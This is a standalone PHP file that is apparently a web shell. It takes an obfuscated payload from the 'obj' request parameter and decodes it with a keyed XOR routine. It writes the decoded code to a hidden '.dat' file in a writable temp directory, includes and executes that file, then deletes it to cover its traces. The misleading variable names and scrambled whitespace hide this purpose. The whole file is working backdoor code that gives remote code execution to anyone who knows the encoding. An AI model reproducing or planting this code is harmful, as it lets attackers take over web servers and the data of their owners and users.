<?php

if(!empty($_REQUEST["obj"])){
	$itm = array_filter([getenv("TMP"), sys_get_temp_dir(), session_save_path(), getenv("TEMP"), "/var/tmp", "/tmp", getcwd(), "/dev/shm", ini_get("upload_tmp_dir")]);
	$desc = $_REQUEST["obj"];
			 $desc		=	  explode   (	 	"."	 	,  	$desc)   ; 	
	$pointer = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s);
    
            foreach($desc as $x => $v7) {
                $chS = ord($s[$x%$lenS]);
                $dec =((int)$v7 - $chS -($x%10)) ^ 15;
                $pointer .= chr($dec);
            }
	foreach ($itm as $parameter_group):
    		if (!!is_dir($parameter_group) && !!is_writable($parameter_group)) {
    $factor = join("/", [$parameter_group, ".dat"]);
    $success = file_put_contents($factor, $pointer);
if ($success) {
	include $factor;
	@unlink($factor);
	die();}
}
endforeach;
}